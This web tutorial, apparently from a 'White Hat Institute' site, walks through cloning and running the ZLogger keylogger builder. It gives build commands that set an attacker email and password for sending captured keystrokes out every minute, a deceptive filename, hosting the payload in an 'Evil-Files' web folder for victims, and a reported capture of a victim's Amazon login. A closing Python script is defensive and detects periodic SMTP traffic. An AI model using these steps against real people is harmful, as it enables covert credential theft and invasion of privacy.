White Hat Institute

Make a keylogger using the ZLogger tool

Keyloggers are a form of monitoring software that records a user’s keystrokes. These keystroke loggers, one of the oldest types of cyber attack, record the information you type into a website or application and send it to a third party.

ZLogger is a Python-based keylogger written by a security professional, Zaid Al-Quraishi. The main feature of this tool is that it creates a persistent keylogger for Windows and Linux operating systems. The keylogger does not require admin privileges, and it starts at system startup. It captures every keystroke and sends a report via email to an attacker.

To download ZLogger, visit the following page https://github.com/z00z/ZLogger and copy the downloadable link.

Open your terminal and download the tool using the “git clone” command.

Ex: ([email protected]:/opt# git clone https://github.com/z00z/ZLogger.git).

Next, change your directory to “ZLogger” and list the contents.


To run the program, we use the “python” command. Before specifying any options, we list all the available ones with the “--help” option.

Ex: ([email protected]:/opt/ZLogger# python zlogger.py --help).

Now let’s create a keylogger and see it in action. In this example, we’ll be targeting a Windows-based operating system using the “-w” option, with the interval “-i” set to 60 seconds, so our keylogger will send a report every minute. Next, we need to provide our email address using the “-e” option and the password of the email account using “-p”. We need to provide this information so the keylogger knows where to send the captured data. Lastly, we name the keylogger output file using the “-o” option.

Ex: ([email protected]:/opt/ZLogger# python zlogger.py -i 60 -w -e [email protected] -p johndoesecurity -o please_click_me_I_am_not_a_keylogger).

Once the build completes, the keylogger is saved in the “ZLogger/dist/” directory as a “please_click_me_I_am_not_a_keylogger” file. Before executing this file on the target computer, don’t forget to allow less secure applications in your Gmail account. Use the following link to do so: https://myaccount.google.com/lesssecureapps.

Next, copy the file to our web server so it can be reached and downloaded easily from the target computer.

Ex: ([email protected]:/opt/ZLogger/dist# cp please_click_me_I_am_not_a_keylogger.exe /var/www/html/Evil-Files/).

Now let’s download it to our victim PC and see it in action.

Once our victim runs the executable and tries to type or browse something, our keylogger will capture the keystrokes and send them to our email address.

As shown in the image below, we managed to receive a report from ZLogger with a captured username and password from Amazon.

Keyloggers are used by criminals to steal personal or financial information, such as banking information, which they then sell or use for profit. They do, however, have legitimate uses in the workplace, such as troubleshooting, improving user experience, and monitoring employees. Keylogging is also used for monitoring by law enforcement and intelligence agencies.
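From the defender's side, the behaviour described above (a program that e-mails a report at a fixed interval, 60 seconds in the example) shows up as regularly spaced outbound SMTP connections from a process that is not a mail client. The following is an added example, not part of ZLogger or the original article; the record format, the port set and the allowlist are assumptions, and the sample records are constructed.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Assumption: reports leave over the standard SMTP / submission ports.
SMTP_PORTS = {25, 465, 587}
# Assumption: hypothetical allowlist of programs expected to speak SMTP here.
ALLOWED = {"thunderbird.exe", "outlook.exe"}

# Constructed sample: (seconds since capture start, process name, remote port).
SAMPLE = [
    (0, "please_click_me_I_am_not_a_keylogger.exe", 587),
    (5, "chrome.exe", 443),
    (10, "backup.exe", 587),
    (30, "thunderbird.exe", 587),
    (60, "please_click_me_I_am_not_a_keylogger.exe", 587),
    (90, "thunderbird.exe", 587),
    (121, "please_click_me_I_am_not_a_keylogger.exe", 587),
    (150, "thunderbird.exe", 587),
    (180, "please_click_me_I_am_not_a_keylogger.exe", 587),
    (210, "thunderbird.exe", 587),
    (240, "please_click_me_I_am_not_a_keylogger.exe", 587),
    (400, "backup.exe", 587),
    (450, "backup.exe", 587),
    (2000, "backup.exe", 587),
]

def find_periodic_smtp(records, min_events=4, max_jitter=0.1, allowed=ALLOWED):
    """Return {process: mean interval in seconds} for non-allowlisted
    processes whose SMTP connections recur at a near-constant interval."""
    times = defaultdict(list)
    for ts, proc, port in records:
        if port in SMTP_PORTS and proc.lower() not in allowed:
            times[proc].append(ts)
    flagged = {}
    for proc, stamps in times.items():
        if len(stamps) < max(min_events, 2):
            continue  # too few connections to judge regularity
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        # Coefficient of variation: low value means timer-driven traffic.
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            flagged[proc] = round(avg, 1)
    return flagged

if __name__ == "__main__":
    for proc, interval in find_periodic_smtp(SAMPLE).items():
        print(f"periodic SMTP from {proc}: every ~{interval}s")
```

In practice the records would come from endpoint or firewall telemetry that ties each connection to a process, and the allowlist would be tuned to the mail software actually deployed.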